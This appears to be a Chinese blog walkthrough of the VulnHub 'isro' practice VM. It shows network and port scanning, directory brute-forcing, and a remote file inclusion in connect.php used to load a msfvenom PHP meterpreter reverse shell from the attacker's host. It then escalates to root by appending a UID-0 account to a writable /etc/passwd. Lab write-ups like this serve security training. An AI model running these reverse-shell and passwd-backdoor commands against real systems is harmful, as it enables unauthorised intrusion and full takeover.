vulnhub之isro的实践

  • A+
所属分类:安全文章

本周实践的是vulnhubisro镜像,下载地址,https://download.vulnhub.com/ha/isro.zip,

首先做地址扫描,sudo netdiscover -r 192.168.137.0/24,

vulnhub之isro的实践

接着做端口扫描,sudo nmap -sS -sV -T4 -A -p- 192.168.137.80,

vulnhub之isro的实践

再来个目录文件爆破,sudo dirb http://192.168.137.80 -X .php,.txt,.zip,.html,

vulnhub之isro的实践

这个地方直接猜测http://192.168.137.80/connect.php有文件包含漏洞,一试还真有,案理说不该这么直接猜的,应该拿web漏洞扫描器扫出来,

vulnhub之isro的实践

不管这么多了,总之就是要利用这个漏洞,

在kali攻击机上做一个反弹shell脚本,

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.137.194 LPORT=4444 R > shell.php,

在kali攻击机上开启web文件下载服务,python -m SimpleHTTPServer,

在kali攻击机上开一个meterpretershell监听,

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.137.194
exploit

这就可以通过访问http://192.168.137.80/connect.php?file=http://192.168.137.194:8000/shell.php来制造反弹shell,

拿到meterpreter反弹shell后getuid查看,不是root,还需要继续提权,

vulnhub之isro的实践

先转成交互式的shell,

shell,python3 -c 'import pty;pty.spawn("/bin/bash")',

查看/etc/passwd,ls -la /etc/passwd,发现当前账户可写,

那就有招了,可以制作一个账户密码填进去,hacker/password,

制作密码,perl -le 'print crypt("password","salt")',

填到/etc/passwd里,echo "hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash" >> /etc/passwd,

再切换账户,su hacker,再id查看,获取root权限完成,

vulnhub之isro的实践


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: